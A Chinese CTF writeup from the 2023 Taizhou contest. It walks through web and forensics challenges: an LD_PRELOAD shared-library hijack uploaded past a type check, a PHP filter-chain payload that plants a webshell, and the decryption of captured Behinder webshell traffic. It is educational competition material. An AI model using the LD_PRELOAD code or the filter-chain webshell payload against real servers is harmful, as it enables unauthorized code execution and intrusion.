首页 > 其他分享 >2023年台州市网络安全大赛Writeup

2023年台州市网络安全大赛Writeup

时间:2023-09-27 20:22:25浏览次数:85  
标签:convert base64 UTF7 Writeup 台州市 iconv decode 2023 UTF8

Web

easyLD

Content-Type: image/png绕过上传.so文件

可以看到前面的利用都是基于其相关命令加载了strncmp函数,通过构造对strncmp函数的劫持来实现的,如果有些命令不加载strncmp函数的话其就无法正常运行起来,这个时候有一种思路就是所有的命令进行全量劫持从而达到全局劫持的效果,相关的代码如下所示:

#include<stdlib.h>
#include<stdio.h>
#include<string.h>
__attribute__ ((__constructor__)) void preload (void){
 unsetenv("LD_PRELOAD");
 system("cat /flag");
}
gcc -shared -fPIC eval.c -o eval.so  #编译

briefphp

``

python3 php_filter_chain_generator.py --chain "<!DOCTYPE"


访问shell.php

传参

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

密码是post 1 蚁剑连接拿到flag

Misc

Black Mamba

文件尾部存在冗余字符

与十进制24异或,拿到压缩包

另存为zip文件

字典爆破,拿到密码1qaz@WSX,解压内容如下:

Dvorak解码:

李先生的计算机

使用工具:

内存取证,使用FTF导出文件

  1. 另存为1.7z,压缩包打开是个图片,需要密码

  2. 发现聊天的数据库文件.db结尾,导入Navicat,在search.db当中发现聊天记录


通过审计聊天记录,发现:

  1. JPG文件加密过,加密密码是123654
  2. 压缩包密码是微信号dbt_1126_tta
  3. 共转账600

解压1.7z,然后JPhide隐写解密,密码是123654,拿到银行卡号

用这个工具

卡号是

6222025567723373838

拼起来就是flag

这是神马

流量分析,发现冰蝎3.0特征

了解加密原理,先base64编码再AES,因此对流量解密的方式就是先AES解密,密钥为144a6b2296333602

过滤http

http


对这种大流量,1394字节的流量解密



最下面是命令

base64解码

一条条解密,直到发现执行了这条指令

cd /var/www/html/upload/../;tar -czvf - flag | openssl des3 -salt -k th1sisKey -out ./flag.tar.gz

用这个盐,重新解密过去,指令如下:

openssl des3 -d -salt -k th1sisKey -in ./flag.tar.gz -out ./flag.tar

解压出来,是一个txt,里面是颜文字,想到Emoji AES解密

key是th1sisKey

标签:convert,base64,UTF7,Writeup,台州市,iconv,decode,2023,UTF8
From: https://www.cnblogs.com/skyxmao/p/17734229.html

相关文章

  • 2023-2024-1 20231401 《计算机基础与程序设计》第一周学习总结
    作业信息该作业属于2023-2024-1计算机基础与程序设计https://edu.cnblogs.com/campus/besti/2023-2024-1-CFAP作业要求在https://www.cnblogs.com/rocedu/p/9577842.html#WEEK01作业目标:加入云班课,参考学习本周学习资源注册博客园账号,加入2022-2023-1-计算机基础与程序设计......
  • 2023-2024-1 20231325《计算机基础与程序设计》 第1周学习总结
    作业信息这个作业属于哪个课程2023-2024-1《计算机基础与程序设计》这个作业的要求在哪里2023-2024-1计算机基础与程序设计第一周作业这个作业的目标快速浏览教材《计算机科学概论》,提出自己不懂或最想解决的问题并在期末回答作业正文本博客链接https://i.cnb......
  • 2023.9.27 LGJ Round
    A已知一个字符串\(n\le1e3\)中的若干信息,:\((x,y,z)\)表示\(x\)后缀和\(y\)后缀的\(\text{LCP}=z\).求满足条件的字典序最小的字符串。已知\(a_{x+i}=a_{y+i}(i<z)\),考虑维护并查集,一定相同的在一个集合。然后要处理的是\(a_{x+z}\neqa_{y+z}\)。从前往后填即可。......
  • 2023-2024-1 20231402 《计算机基础与程序设计》第1周学习总结
    2023-2024-120231402《计算机基础与程序设计》第1周学习总结作业信息班级2023-2024-1-计算机基础与程序设计作业要求2023-2024-1计算机基础与程序设计第1周作业作业目标浏览教材并提出问题作业正文https://www.cnblogs.com/lsh0815/p/17731540.html教材学习中提出的问......
  • 2023 Bonree ONE 秋季产品发布会:亮点抢先看!
    ......
  • 2023年9月中旬大模型新动向集锦
    2023年9月中旬大模型新动向集锦2023.9.20版权声明:本文为博主chszs的原创文章,未经博主允许不得转载。1、微软发布13亿参数小模型phi-1.5微软研究院于2023年9月11日发布了名为phi-1.5的全新预训练语言模型,共有13亿个参数,适用于QA问答、聊天格式和代码等等场景。phi-1.5采用来......
  • ICCV 2023 清华ETH提出 Retinexformer 刷新十三大暗光增强榜单
    前言 本文介绍了ICCV2023上的新工作《Retinexformer:One-stageRetinex-basedTransformerforLow-lightImageEnhancement》本文转载自我爱计算机视觉仅用于学术分享,若侵权请联系删除欢迎关注公众号CV技术指南,专注于计算机视觉的技术总结、最新技术跟踪、经典论文解读......
  • 2023/9/25 进行实验
     结果为false,因为比较的是地址,而不是数,所以结果为false ......
  • 2023/09/27
    四则运算课堂测试三 1、可定制(数量):输入大的出题数量值,测试一下系统是否崩溃,反向查找系统是否优化的余地;2、定制操作数的个数、定制是否有乘除法、定制是否有括号(随机加入)、定制数值范围(确定操作数的取值范围);3、定义方法实现错题集、错题重练并记录错题的次数功能。4、能处理......
  • 2023年台州市初赛Misc
    2023年台州市初赛Misc这是神马冰蝎流量,找到key<?php@error_reporting(0);session_start();$key="144a6b2296333602";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");i......